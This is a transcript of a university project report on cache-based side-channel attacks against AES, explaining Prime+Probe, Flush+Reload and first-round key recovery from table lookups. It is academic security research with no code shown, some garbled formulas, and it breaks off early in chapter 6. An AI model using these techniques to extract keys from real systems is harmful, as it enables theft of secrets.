Cache Based Side Channel Attacks On AESrgiri8/files/RPG_BTP.pdf"Cache Based Side Channel Attacks on...
Transcript of Cache Based Side Channel Attacks On AESrgiri8/files/RPG_BTP.pdf"Cache Based Side Channel Attacks on...
Cache Based Side Channel Attacks On AES
A Major Project Report
Submitted in partial fulfillment for the Award of
BACHELOR OF TECHNOLOGY
IN
COMPUTER SCIENCE AND ENGINEERING
By
Ravi Prakash Giri
2011ECS32
To
SHRI MATA VAISHNO DEVI UNIVERSITY,
J&K, INDIA
MAY, 2015
ii
Certificate
This is to certify that I, Ravi Prakash Giri ( 2011ECS32 ) have worked under the
guidance of Mrs. Sonika Gupta on the project titled ”Cache Based Side Channel
Attacks On AES” in the School of Computer Science & Engineering, College of
Engineering, Shri Mata Vaishno Devi University, Kakryal, Jammu & Kashmir from
2nd Jan 2015 to 17th May 2015 for the award of Bachelor of Technology in
Computer Science & Engineering.
The contents of this project, in full or in parts, have not been submitted to any
other Institute or University for the award of any degree or diploma.
Student’s Signature
Student’s Name
This is to certify that the above student has worked for the project titled
”Cache Based Side Channel Attacks on AES” under my supervision.
Signature:
Guide Name: Mrs. Sonika Gupta
iii
iv
Acknowledgement
I would like to express my sincere gratitude to Prof. Bernard L. Menezes, IIT-
Bombay for his constant motivation, useful suggestions and words of wisdom. He has
been my primary source of guidance during my entire project. I would like to extend
my gratitude towards my internal guide Mrs. Sonika Gupta for her guidance and
for providing necessary information regarding the project. I am extremely grateful
for the opportunity to work on this project in a team comprising Bholanath Roy,
Vibhor Agrawal, Ashokkumar C under the supervision of Prof. Bernard Menezes
at IIT-Bombay. A summery of this work has been submitted recently in a paper
titled ” Design and Implementation of an Espionage Network for Cache based Side
Channel Attacks on AES ” to an international conference.
v
Abstract
Side channel attacks exploit information gained from physical implementation
or design rather than mathematical weaknesses of the cryptographic systems . We
have extended and modified the existing work in the field of cache-based side channel
attacks targeting the software implementation of Advanced Encryption Standard
(AES) by designing and implementing the espionage network. Our model includes
a spy controller, ring of spy threads and an analytical operator all hosted on a
single server. A collaborative execution of spy controller and spy ring restrict the
victim process to access very few cache memory lines where the lookup tables reside.
Our results indicate that our setup can deduce the encryption key in fewer than 30
encryptions and with far fewer victim interruptions compared to previous work.
Moreover, this approach can be adapted to work on various OS platforms and on
different versions of OpenSSL.
vi
List of Figures
3.1 Access based cache attack[3] . . . . . . . . . . . . . . . . . . . . . . . 9
5.1 SubBytes() Transformation[2] . . . . . . . . . . . . . . . . . . . . . 14
5.2 ShiftRows() Transformation[2] . . . . . . . . . . . . . . . . . . . . . 15
5.3 MixColumns() Transformation[2] . . . . . . . . . . . . . . . . . . . . 15
5.4 AddRoundKey() Transformation . . . . . . . . . . . . . . . . . . . . . 16
6.1 Evict-Time & Prime-probe . . . . . . . . . . . . . . . . . . . . . . . . 21
6.2 Graph showing cache sets with high Access Time . . . . . . . . . . . 22
6.3 Equations for second round attack . . . . . . . . . . . . . . . . . . . . 24
7.1 Functioning of the Completely Fair Scheduler.[11] . . . . . . . . . . . 26
7.2 Denial Of Service attack on CFS.[11] . . . . . . . . . . . . . . . . . . 27
8.1 Flush - reload attack timings [18] . . . . . . . . . . . . . . . . . . . . 30
8.2 Code for the Flush+Reload Technique [18] . . . . . . . . . . . . . . . 31
8.3 The Espionage Network. . . . . . . . . . . . . . . . . . . . . . . . . . 32
8.4 Timeline of victim and spy threads. . . . . . . . . . . . . . . . . . . . 32
8.5 Frequency Vs Cache Access Time(ticks). . . . . . . . . . . . . . . . . 34
10.1 #Accesses per run(#spy threads=10). . . . . . . . . . . . . . . . . . 45
10.2 #Accesses per run(#spy threads=40). . . . . . . . . . . . . . . . . . 45
10.3 Cache accesses detected by Spy threads. . . . . . . . . . . . . . . . . 46
10.4 Differences in the peak for 1100 accesses . . . . . . . . . . . . . . . . 48
10.5 Differences in the peak for 1300 encryptions . . . . . . . . . . . . . . 49
10.6 Encryptions required (Perfectly Synch. . . . . . . . . . . . . . . . . . 49
10.7 Encryptions required(synch. from last table accesses). . . . . . . . . 50
10.8 Encryptions required for second round attack(prefetching disbaled). 51
10.9 Encryptions required for second round attack(prefetching enabled. . 51
11.1 Intel MSR Prefetcher. . . . . . . . . . . . . . . . . . . . . . . . . . . 54
vii
List of Tables
4.1 Steps in calculating a50 . . . . . . . . . . . . . . . . . . . . . . . . . . 11
10.1 Conflicting access resolution . . . . . . . . . . . . . . . . . . . . . . . 47
viii
Contents
Acknowledgement iv
Abstract v
List of Figures vi
List of Tables vii
1 Introduction 1
1.1 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.2 Problem Statement . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.2.1 Motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.2.2 Goals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.3 Report Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
2 Related Work 4
3 Preliminaries 6
3.1 Basics of Cache working . . . . . . . . . . . . . . . . . . . . . . . . . 6
3.2 Cache based Side Channel Attacks . . . . . . . . . . . . . . . . . . . 7
3.3 Types of Cache based side channel attacks . . . . . . . . . . . . . . . 8
3.3.1 Time driven . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
3.3.2 Trace driven . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
3.3.3 Access driven . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
4 Cache Attacks in Cryptographic Algorithms 10
4.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
4.1.1 Cache attacks in secret key cryptography . . . . . . . . . . . . 10
4.1.2 Cache attacks in public key cryptography . . . . . . . . . . . . 11
5 Advanced Encryption Standard 12
5.1 Description of the Cipher . . . . . . . . . . . . . . . . . . . . . . . . . 12
ix
5.2 AES Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
5.2.1 Key Expansions . . . . . . . . . . . . . . . . . . . . . . . . . . 13
5.2.2 Initial Round . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
5.2.3 Rounds . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
5.2.4 Final Round . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
5.3 AES Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
5.3.1 Round Transformations . . . . . . . . . . . . . . . . . . . . . 16
5.3.2 Last Round Implementation . . . . . . . . . . . . . . . . . . . 18
6 Cache attacks on Non-shared table 19
6.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
6.2 Cache access measurement . . . . . . . . . . . . . . . . . . . . . . . . 20
6.3 First Round Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
6.4 Second Round Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
7 Cache attacks by exploiting CFS 25
7.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
7.2 Completely Fair Scheduler . . . . . . . . . . . . . . . . . . . . . . . . 25
7.3 Attacking CFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
7.4 Retrieving Key . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
8 Design & Implementation of Espionage Infrastructure 29
8.1 Flush+Reload Technique . . . . . . . . . . . . . . . . . . . . . . . . . 29
8.2 Our espionage infrastructure . . . . . . . . . . . . . . . . . . . . . . . 31
8.3 Approach for Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
8.3.1 Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
9 Coding 36
9.1 Experimental Setup . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
9.2 Attacker source code . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
10 Results and Analysis 44
11 Countermeasures 53
11.1 Pre-fetching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
11.1.1 Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
11.1.2 Workaround . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55
11.2 Look-up tables Misalignment . . . . . . . . . . . . . . . . . . . . . . . 56
11.3 Synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
1
Chapter 1
Introduction
With the increasing popularity of internet as a communication as well as data stor-
age medium, demand for securing the confidential data from unauthorized access
has increased a lot during the last decade. Cryptographic schemes that prevent
confidential data to be accessed by unauthorized users have become increasingly im-
portant.More and more cryptographic schemes can be seen floating around. Before
being deployed in practice, such schemes typically have to pass a rigorous reviewing
process to eliminate design weaknesses. However, just ensuring theoretical sound-
ness such schemes does not ensure concrete security of its physical implementation.
Side-channel cryptanalysis is any attack on a cryptosystem requiring information
emitted as a byproduct of the physical implementation. Side channel attacks are
an important class of implementation level attacks on cryptographic systems that
exploits leakage of information through data-dependent characteristics of physical
implementations such as electromagnetic radiation, power consumption of device,
running time of certain operations, etc. and, typically, are specific to the actual
implementation of the algorithm. Side channel attacks utilize the fact that in re-
ality, a cipher is not a pure mathematical function Ek[P ] → C, but a function
Ek[P ] → (C, t), where t is any additional information produced by the physical
implementation[13]. An important class of timing attacks are those based on ob-
taining measurements from cache memory systems.
General classes of side channel attack include:
Timing-Attack is based on measuring how much time various computations
take to perform. Power-monitoring attacks are the those that make use of vary-
ing power consumption by the hardware during computation. Electromagnetic
Attacks are based on leaked electromagnetic radiation, which can directly provide
plaintexts and other information. Such measurements can be used to infer crypto-
graphic keys using techniques equivalent to those in power analysis or can be used
2
in non-cryptographic attacks, e.g. TEMPEST (aka van Eck phreaking or radiation
monitoring) attacks. Acoustic cryptanalysis and Differential fault analysis
attacks exploit sound produced during a computation (rather like power analysis).
Row Hammer are another kind of side channel attacks in which off-limits memory
can be changed by accessing adjacent memory.
The Advanced Encryption Standard (AES)[6] is a relatively new algorithm for
secret key cryptography, is now universally supported on servers, browsers, etc.
Software implementations of AES including OpenSSL, make extensive use of table
lookups in lieu of time-consuming mathematical field operations[6]. Cache-based
side channel attacks take advantage of the fact that access times to different levels
of the memory hierarchy are different and hence it can retrieve the key of a victim
performing AES.
1.1 Purpose
The purpose of our experiment is to design and implement an efficient cache based
side channel attacks on Advanced Encryption Standard - the de facto standard of
secret key cryptography. In last 10 years, various attacks on AES has been reported
with some complications. So the main purpose of our experiment is to develop
a much easier attack that require very less Victim interruptions and encryptions
in comparison to any previous works and can be incorporated on today’s modern
processors like core i-5 and core i-7.
1.2 Problem Statement
1.2.1 Motivation
Among many side channel attacks available, the reason we are particularly interested
in cache as side channel attacks is that caches form a shared resource for which all
processes compete, and it thus is affected by every process. While the data stored
in the cache is protected by virtual memory mechanisms, the metadata about the
contents of the cache, and in particular the memory access patterns of processes
using that cache, are not fully protected.
Thus, cache provides an easy to access medium, which attacker can spy on, in a
concealed manner.
3
1.2.2 Goals
• To design and implement an espionage network with associated analytic ca-
pabilities that retrieve the AES key using fewer encryptions and also fewer
interruptions to the victim process.
• To demonstrate a complete attack on OpenSSL implementation of AES. Fur-
ther to reduce the time quantum provided to the victim process to an extent
useful for our attack.
• To understand how shared as well as non-shared AES tables both can be
exploited using cache.
1.3 Report Overview
This document is a brief report on how cache can be exploited as side channel attack.
To start with, the report briefly describes how cache works and how it can be used
as a medium for spying and gathering information, which otherwise is meant to be
secret.
Chapter 2 of this report describes the related work done in this field. Chapter
3 describes the preliminaries of Side Channel Attacks and cache working. Chapter
4 gives a wide idea about how cache can be used in both public key cryptography
and secret key cryptography as medium for attacker. The report majorly comprises
of attack on AES, so chapter 5 explains AES algorithm and how it is implemented.
We will be focusing on this algorithm only, to perform our attack. In chapter 6 and
chapter 7 we will go through the techniques to exploit AES in shared as well as
non-shared scenario. The next chapter deals with the design and implementation
of our espionage infrastructure for the attack. In the following chapters, we will
analyse the results of our attack and discuss the countermeasures.
4
Chapter 2
Related Work
The first consideration of cache memory as a covert channel to extract sensitive in-
formation was mentioned by Hu[12]. In April 2005, the software implementations of
AES was exploited and reported by Bernstein. D.J. Bernstein announced a cache-
timing attack that he used to break a custom server that used OpenSSL’s AES
encryption[5]. The attack required over 200 million chosen plaintexts on Pentium-
III machine. The custom server was designed to give out as much timing information
as possible (the server reports back the number of machine cycles taken by the en-
cryption operation). Although their attack is generic and portable, it needs 227.5
encryptions and sample timing measurements with known key in an identical con-
figuration of target server.
In 2003, Tsunoo et al.[17] demonstrated time driven cache attack on DES. They
focused on overall hit ratio during encryption and performed attack by exploiting the
correlation between cache hits and encryption time. A similar approach was used
by Bonneau et al., where they emphasized individual cache collisions during encryp-
tion instead of overall hit ratio[13]. Although Bonneau’s attack was a considerable
improvement over previous work, it still requires 213 timing samples.
In October 2005, Dag Arne Osvik, Adi Shamir and Eran Tromer presented a
paper[16] demonstrating several cache-timing attacks against AES. One attack was
able to obtain an entire AES key after only 800 operations triggering encryptions,
in a total of 65 milliseconds. This attack requires the attacker to be able to run
programs on the same system or platform that is performing AES.
A major contribution in access-driven cache attacks appeared in Tromer et al.
paper presented in 2010[7]. They performed both synchronous and asynchronous
attacks. In synchronous attack, 300 encryptions were required to recover 128 bit
AES key on Athlon64 system and in asynchronous attack, 45.7 bits of information
about key was retrieved effectively. They introduced the Prime + Probe technique
5
to perform an access-driven attack. In prime phase, attacker fills cache with its own
data before encryption begins. During encryption, victim evicts some of attacker’s
data from cache in order to load lookup table entries. In probe phase, attacker
calculates reloading time of its data and finds cache misses corresponding to those
lines where victim loaded lookup table entries. Both the attacker and victim must
execute on the same core of the processor to make the attack successful.
The ability to detect whether a cache line has been evicted or not, was further
exploited by Neve et al in 2007[14]. Advancing in the mainstream of asynchronous
attacks, they performed improved access-driven cache attack on last round of AES
to recover 128 bit key with 20 encryptions. However, this attack was feasible only
on single-threaded processors and the practicality of their attack implementation
was not clear due to insufficient system and OS kernel version details.
Gullasch et al. proposed an efficient access driven cache attack[11] when attacker
and victim use a shared crypto library. The spy process first flushes the memory lines
corresponding to entire lookup table entries from all levels of cache and interrupts
victim process after allowing it single lookup table access. After every interrupt,
by calculating reload time it finds which memory line is accessed by victim. This
information is further processed using neural network to remove noise in order to
retrieve the AES key.
Wei et al. used Bernstein’s timing attack on AES running inside an ARM
Cortex-A8 single core system in a virtualized environment to extract AES encryp-
tion key[15]. Apecechea et al. in 2014 performed Bernstein’s cache based timing
attack in a virtualized environment (Xen and VMware VMMs) to recover AES se-
cret key[10] from co-resident VM with 229 encryptions. Later they improved it in
Irazoqui et al. paper[8] using Flush + Reload technique and recover AES secret key
with 219 encryptions.
We are improving over prior works performed in last decade by providing a first
practical access-driven attack on AES algorithm. Our attack will be working in much
weaker assumptions and very less Victim interruptions than any attacks discussed
so far. Moreover, it is very efficient as it require only 25 encryptions to retrive the
complete AES key.
6
Chapter 3
Preliminaries
3.1 Basics of Cache working
Cache is placed between RAM (main memory) and CPU. The instructions and data,
before reaching CPU from memory gets stored in cache and are accessed from there.
Cache is a component that stores data so future requests for that data can be served
faster; the data stored in a cache might be the results of an earlier computation,
or the duplicates of data stored elsewhere. A cache hit occurs when the requested
data can be found in a cache, while a cache miss occurs when it cannot. When
a cache miss occurs, the CPU retrives the data from the main memory and stores
it in to the cache. This action is motivated by the temporal locality principle:
recently accessed data is likely to be accessed again. Cache hits are served by reading
data from the cache, which is faster than recomputing a result or reading from a
slower data store; thus, the more requests can be served from the cache, the faster
the system performs.
However, the CPU is going to take advantage of spatial locality as well:
when a data is accessed,the values stored close to the accessed data is likely to be
accessed again. Hence, when a cache miss occur, it not only load that data but
loads the whole cache line that includes the data nearby. The cache line represents
the partitions of the data that can be written or retrived at a time.
To understand this problem in more detail, lets us assume we have a n-way set
associative cache memory, where each address can be mapped to n different cache
blocks. Cache contains 2a cache sets each containing n cache lines and each line in
turn contains 2b bytes of data. To locate a cache line holding data from memory
address A, least significant b bits are ignored as cache line size is 2b bytes. Next
a bits denotes the cache set and remaining bits are tag field for verification of the
correct entry. Data can go into any line within a specific set.
7
This granularity level is determined by some predetermined cache replacement
policy. In general Least Recently Used page replacement policy is used.
3.2 Cache based Side Channel Attacks
Previously side channel attacks were used to break specialized systems such as smart
cards etc. Now a days major focus is on side channel attacks that exploit the shared
resources in conventional microprocessors. Such attacks are very powerful because
they do not require the attackers physical presence to observe the side-channel and
can therefore be launched remotely using only non-privileged operations.
Cache-based side-channel attacks represent an example of this class of attacks.
In this, attacker process monitors the cache activity performed the victim cipher
process. If carefully designed, such attacks can leak enough information about the
secret key. Cache-based side-channel attacks are based on the fact that if CPU
accesses data from memory, and that data is not available in cache, it experiences a
delay pertaining to cache miss and this delay is significant enough to be measured
from the situation where data is present in cache and accessed. Victim can thus find
out the occurrence and frequency of cache misses.
The runt-time of the fast software based ciphers like AES heavily depends on
the speed at which table look ups are performed. A popular style of implementation
of the AES is its T-table implementation[6]. It combines all four major operations
that is being performed throughout the encryptions into one single table look up
per state byte along xor operations. The index of the loaded entry is determined
by a byte of the cipher state. Therefore the information on which table values have
been loaded into cache can reveal information about the secret state of AES.
In any side channel attack, there are essentially two phases:
1. Online phase where side channel information is gained using repeated en-
cryption/decryption. Here, attacker measures and tabulates the side channel
information (timing, power consumption etc) as per the attack method.
2. Offline phase where the data from Online phase is used to generate results and
graphs which helps in prediction and verification of observations regarding the
secret value of the cipher. In many cases, we can actively utilize analysis from
this phase to carry out encryption and decryption in Online phase.
8
3.3 Types of Cache based side channel attacks
3.3.1 Time driven
In time-driven attacks[5], attacker can observe the aggregated profile of an encryp-
tion or decryption, i.e. total execution time taken by the cipher process to complete
that encryption or decryption. Attacker thus correlates the time taken by cipher
process to the number of cache misses occurring during that encryption. More the
number of cache misses more the execution time. This attack relies on the accurate
measurement of timing of the encryption and execute the timing code synchronously
before and after an encryption round.
As this attack is based on overall execution time, there can be other factors (other
processes running simultaneously with victim) affecting the victim process, we need
a large number of sample in offline phase to accurately measure the information
about secret key. Being sad, this type of attack is very easy to carry out and
requires minimal coding in online phase for gathering information required. To find
out the relationship between timing information and key values, attacker can make
statistical algorithm-specific inferences about the state during processing.
For example, it might be inferred that in encryption with large number of misses,
certain key related variable are not equal as they access different parts of memory
causing cache misses, while in lesser number of misses, they are equal. With such
kind of observations, attacker can relate plain-text to cipher key and hence unravel
the key bits.
3.3.2 Trace driven
In Trace-driven attacks[3], attacker is able to capture the profile of cache activity
during encryption, up to the granularity of individual memory accesses. In this type
of attack, the attacker can figure out the outcome of every memory access (trace)
the cipher process issues in terms of hits and misses.
Trace can be defined as sequence of cache hits and misses. For example: HMMM,
MMMH, HHMM, HMHM is a valid trace, where H represents hit and M represent
cache miss. The attacker can observe if a particular memory access to a lookup table
yield a hit or miss, thus can infer information about the lookup indices. As these
indices are key dependent in almost all cases, secret information can be revealed.
This type of information can be calculated using simple power analysis of the
target process. As the power consumption of a microprocessor is dependent on
the instruction being executed and on data being manipulated, the attacker can
therefore observe the difference in power consumption when cache miss routine is
9
being carried out by the victim.
3.3.3 Access driven
These are most recent of all three and most powerful amongst them. In this the
attacker and victim process shares the cache memory, and secret information is
leaked using the cache as side channel medium. Here the attacker can determine
information up to the granularity of the cache sets modified by the victim process.
Thus, attacker can determine the elements of lookup table accessed by the cipher.
Figure 3.1: Access based cache attack[3]
The whole process can be summarized as below. In such attacks, the two pro-
cesses are executing on the same machine, thus sharing the data cache. Victim
process during encryption requests for data residing in memory causing either cache
hit or miss. Attacker spies this cache activity of the victim process. It, using the
techniques discussed in section X, measures the cache set being accessed.
Among all three techniques, this is the most powerful technique and can give
most information to the attacker. However, gathering such information from the
system under scrutiny is quite complex.
10
Chapter 4
Cache Attacks in Cryptographic
Algorithms
4.1 Introduction
Cache based Side Channel Attacks are applicable to both Secret key as well as public
key encryption schemes. The next two sub-sections briefly describes how it can be
used to attack both the scenarios.
4.1.1 Cache attacks in secret key cryptography
The basic principle of cache based Side channel attack is the difference in access
time of data in case of cache hit vs cache miss.
Secret key cryptography, like AES, DES works on the principle of simple math-
ematical operations which are repeated again and again to get better encrypted
outcome. Like in AES each encryption consists of almost identical 10 rounds with
each round is a combination of 4 simple mathematical/logic operations.
These operations due to their simple nature can easily be realized in the form
of tables/arrays where intermediate data is stored in them and simply accessed
as and when needed. This step greatly reduces the time required to perform the
operations as all the four operations of a round are simply reduced to a few table
accesses.
However, this poses another problem in the form of side channel attack. These
access tables are now stored in cache and the encryption algorithm uses some com-
bination of key bits to access the particular element of the key. If the attacker
somehow, figures out some information about the location access by the encryption
algorithm, he/she can directly relate the same to find out the key bits.
11
4.1.2 Cache attacks in public key cryptography
Public key cryptography on the other hand is based on heavy mathematical opera-
tions (in the order of 100’s of bits of numbers). For example, in RSA encryption of
a message, we need to calculate (mp mod n), where p is a large number of the order
of 1000’s of bit.
Due to such huge complexity involved, they, unlike secret key cryptography can-
not be pre-computed and stored in table. Due to this, these operations takes too
much time as compared to secret key counterparts. As there are no tables involved,
we cannot apply the same principle as that in AES to attack such schemes.
However, we can observe that while performing such operations (modular expo-
nentiation, etc), we take different paths based on the secret bits. As an example, I
want to perform operation a50 for some ’a’.
Writing 50 in binary notation: 110010.
Now, starting with result = 1, and moving right bit by bit from left side (MSb)
in exponent,
For every bit 1, we first square the result and multiply with a.
For every bit 0, we simple square the result.
The steps to get the result[4]:
Bit position considered Result (Initial Value = 1)110010 (12) ∗ a = a110010 (a2) ∗ a = a3
110010 (a3)2 = a6
110010 (a6)2 = a12
110010 ((a12)2 ∗ a = a25
110010 (a25)2 = a50
Table 4.1: Steps in calculating a50
We can clearly see that different operations are performed based on different bit
values. This is the basis of side channel attacks in public Key scenario. These func-
tions will be loaded into the memory and thus will map to some cache location(s).
Let’s assume, square function is mapped at line x and multiply function at line y.
Attacker, instead of spying on the data cache will now look for instruction cache, and
will try to figure out at each step, whether multiplication is performed or squaring
by continuously looking at both lines x and y each time. Once, the attacker get the
ordering of such squaring or multiplication operations, he/she can simply get the
unknown secret exponent easily.
12
Chapter 5
Advanced Encryption Standard
5.1 Description of the Cipher
AES is based on a design principle known as a substitution-permutation network,
combination of both substitution and permutation, and is fast in both software and
hardware. Unlike its predecessor DES, AES does not use a Feistel network. AES is
a variant of Rijndael which has a fixed block size of 128 bits, and a key size of 128,
192, or 256 bits.
Let us briefly take a look at how AES works and how AES tables are computed
and used. AES operates on 4 X 4 column major order matrix of bytes, processing
16 Bytes at a time. The key size determines the number of repetitions of the
transformation rounds, that converts input into intermediary output, which at the
end of last round becomes the cipher text.
Number of rounds are:
1. 10 Rounds for Key size of 128 bits
2. 12 Rounds for Key size of 192 bits
3. 14 Rounds for Key size of 256 bits
Each round consists of several processing steps, each containing four similar but
different stages, including one that depends on the encryption key itself. A set of
reverse rounds are applied to transform ciphertext back into the original plaintext
using the same encryption key.
13
5.2 AES Algorithm
The Algorithm consists of four main parts:
1. Key Expansions: Generating round keys for each round using Rijndael’s key
schedule algorithm. AES requires a separate 128-bit round key block for each
round plus one more.
2. Initial Round: Each byte of the state is combined with a block of the round
key using bitwise xor.
3. Rounds:
• Sub Bytes
• Shift Rows
• Mix Columns
• Add round Key
4. Final Round:
• Sub Bytes
• Shift Rows
• Add round Key
5.2.1 Key Expansions
AES uses Rinjdael key schedule[6] to compute a seperate round key for each round
from the initial key. It uses Rinjdael S-box in the process. Algorithm 1 below is self
explanatory algorithm for the same.
Let w[0] ... w[3] be initialized with original AES key, where w[i] is 4 byte word.
5.2.2 Initial Round
Before starting the first round, each byte of plaintext is combined with corresponding
Byte of Initial 128 bits of Key using bitwise XOR operation.
5.2.3 Rounds
Each round except the last round, performs the four undermentioned steps:
14
Algorithm 1 Rinjdael key schedule
1: procedure KeySchedule2: for i = 4 to 43 do3: x← w[i− 1]4: if (i is a multiple of 4) then5: x← f(x)6: end if7: w[i]← w[i− 4]⊕ x8: end for9: end procedure
1. SubBytes() Transformation : In this step, each byte in the state matrix
is replaced with another according to a lookup table called the Rijndael S-
Box (substitution box). This step provides nonlinearity in the cipher. The
S-box used is derived from the multiplicative inverse over GF(28), known to
have good non-linearity properties. It is a fixed known-to-everyone table. The
secrecy is present in the key and not in the algorithm.
Figure 5.1: SubBytes() Transformation[2]
2. ShiftRows() Transformation : In ShiftRow, the rows of the State are cycli-
cally shifted over different offsets. Row 0 is not shifted, Row 1 is shifted over
C1 bytes, row 2 over C2 bytes and row 3 over C3 bytes. The shift offsets C1,
C2 and C3 depend on the block length. The operation of shifting the rows of
the State over the specified offsets is denoted by:
ShiftRow(State).
3. MixColumns() Transformation : Multiplication of each column by a con-
stant 4x4 matrix over the field GF (28). In this step, a mixing operation is
operated on the four bytes of each column. The MixColumns function takes
four bytes as input and outputs four bytes, where each input byte affects all
15
Figure 5.2: ShiftRows() Transformation[2]
four output bytes. This provides diffusion to the cipher which ensures that
modification of individual bits in the plaintext gets redistributed non-uniformly
in the ciphertext.
Figure 5.3: MixColumns() Transformation[2]
4. AddRoundKey() Transformation : In this operation, a Round Key is applied
to the State by a simple bitwise EXOR. The Round Key is derived from the
Cipher Key by means of the key schedule. The Round Key length is equal to
the block length. The transformation that consists of EXORing a Round Key
to the State is denoted by:
AddRoundKey(State,RoundKey)
The transformation is illustrated in Figure5.4.
5.2.4 Final Round
The MixColumns operation is omitted in the last round, and an additional Ad-
dRoundKey operation is performed before the first round (using a whitening key).
16
Figure 5.4: AddRoundKey() Transformation
5.3 AES Implementation
5.3.1 Round Transformations
The different steps of the round transformation can be combined in a single set of
table lookups, allowing for very fast implementations on processors with word length
32 or above. In this section, it is explained how this can be done. One column of
the round output e is expressed in terms of bytes of the round input a. Here, ai,jdenotes the byte of a in row i and column j, aj denotes the column j of State a.
For the key addition and the MixColumn transformation, we have :
For the ShiftRow and the ByteSub transformations, we have :
In all expression the column indices must be taken modulo block size which is 4 in
this case. By substitution, the above expressions can be combined into:
The matrix multiplication can be expressed as a linear combination of vectors:
The multiplication factors S[ai,j] of the four vectors are obtained by performing
17
a table lookup on input bytes ai,j in the S-box table S[256].
We define tables T0 to T3 :
These are 4 tables with 256 4-byte word entries and make up for 4 KByte of total
space. Using these tables, the round transformation can be expressed as:
ej = T0[x0,j]⊕ T1[x1,j+1]⊕ T2[x2,j+2]⊕ T3[x3,j+3]⊕ kj
Hence, a table-lookup implementation with 4 KB of tables takes only 4 table lookups
and 4 EXORs per column per round. Each table is accessed by using an 8 bit index
and gives 32 bits of output.
There is a separate key setup phase where a given 16-byte secret key k = (k0 ,
. . , k15) is expanded into 10 round keys, K(r) for r = 1, . . . , 10. Each round
key is divided into 4 words of 4 bytes each: K(r) = (K(r)0 , K
(r)1 , K
(r)2 , K
(r)3 ). The 0th
round key is just the raw key: K(0)j = (k4j, k4j+1, k4j+2, k4j+3 ) for j = 0, 1, 2, 3.
18
Given a 16-byte plaintext p = (p0 , . . , p15), encryption proceeds by comput-
ing a 16-byte intermediate state x(r) = (x0 , . . . , x15 ) at each round r . The
initial state x(0) is computed by x(0)i = pi ⊕ ki for (i = 0, . . . , 15). Then, the first
9 rounds are computed by updating the intermediate state as follows[16], for r = 0,
. . . , 8:
(x(r+1)0 , x
(r+1)1 , x
(r+1)2 , x
(r+1)3 )← T0[x
(r)0 ]⊕ T1[x(r)5 ]⊕ T2[x(r)10 ]⊕ T3[x(r)15 ]⊕K(r+1)
0
(x(r+1)4 , x
(r+1)5 , x
(r+1)6 , x
(r+1)7 )← T0[x
(r)4 ]⊕ T1[x(r)9 ]⊕ T2[x(r)14 ]⊕ T3[x(r)3 ]⊕K(r+1)
1
(x(r+1)8 , x
(r+1)9 , x
(r+1)10 , x
(r+1)11 )← T0[x
(r)8 ]⊕ T1[x(r)13 ]⊕ T2[x(r)2 ]⊕ T3[x(r)7 ]⊕K(r+1)
2
(x(r+1)12 , x
(r+1)13 , x
(r+1)14 , x
(r+1)15 )← T0[x12
(r)]⊕ T1[x(r)1 ]⊕ T2[x(r)6 ]⊕ T3[x(r)11 ]⊕K(r+1)3
Finally, to compute the last round above equation is repeated with r = 9, except
that T0, ..., T3 is replaced by T(10)0 , ..., T
(10)3 . The resulting x(10) is the ciphertext. the
change of lookup tables in the last round is due to the absence of MixColumn trans-
formation. Compared to the algebraic formulation of AES, here the lookup tables
represent the combination of ShiftRows, MixColumns and SubBytes operations; the
change of lookup tables in the last round is due to the absence of MixColumns.
5.3.2 Last Round Implementation
Last round can be implemented in multiple ways:
• Using additional table : Here, a seperate table of size 1KB is used. The
entries in this table are simply substituted index concatenated 4 times one
after the other.
• Using previous tables : In this case, some tables which are used in the
previous rounds can be used.
19
Chapter 6
Cache attacks on Non-shared table
6.1 Overview
Synchronous attacks is applicable in scenarios where the plaintext or ciphertext is
known and the attacker can operate synchronously with the program performing
AES encryption on the same processor, by using some interface that triggers en-
cryption under an unknown key. The main target of the attacker is to gather the
table accesses to as much fine granularity as possible.
If we consider a case, where attacker at each instant is able to say that this par-
ticular table access was made by victim process, calculating the secret key will be
trivial. In such a scenario, attacker will simply do an xor operation with the table
access from first intermediate round, and will get the whole key straight away, be-
cause for first round table accesses are simply plain-text byte ⊕ed with corresponding
key byte.
xi = pi ⊕ ki
Knowing the table access exactly means getting xi value. So, simply do an XOR
with the pi to get the ki.
However, this task of getting the table access is not so simple and straightforward,
neither can we achieve this granularity of table access.
As we know that each table entry occupies 4 Byte and assuming cache block size
is standard 64 Byte, 16 table entries will go into one cache block. This cache block
is the minimum amount of data being brought from memory into the cache. So,
even if the victim process has accessed one entry, whole 16 entries corresponding to
that cache block is brought into the memory.
Attacker cannot thus figure out the exact table access. He/she can thus only be
able to find out the cache block which is being accessed by the victim process.
20
To find this information, we need to consider two scenarios.
1. Non-shared table data : Here, cache is shared, i.e. both the processes are
using the same cache, but AES tables are not shared. So, at the start, attacker
don’t even know where the AES tables are in the cache.
2. Shared table data : Here, both the processes have access to same AES table
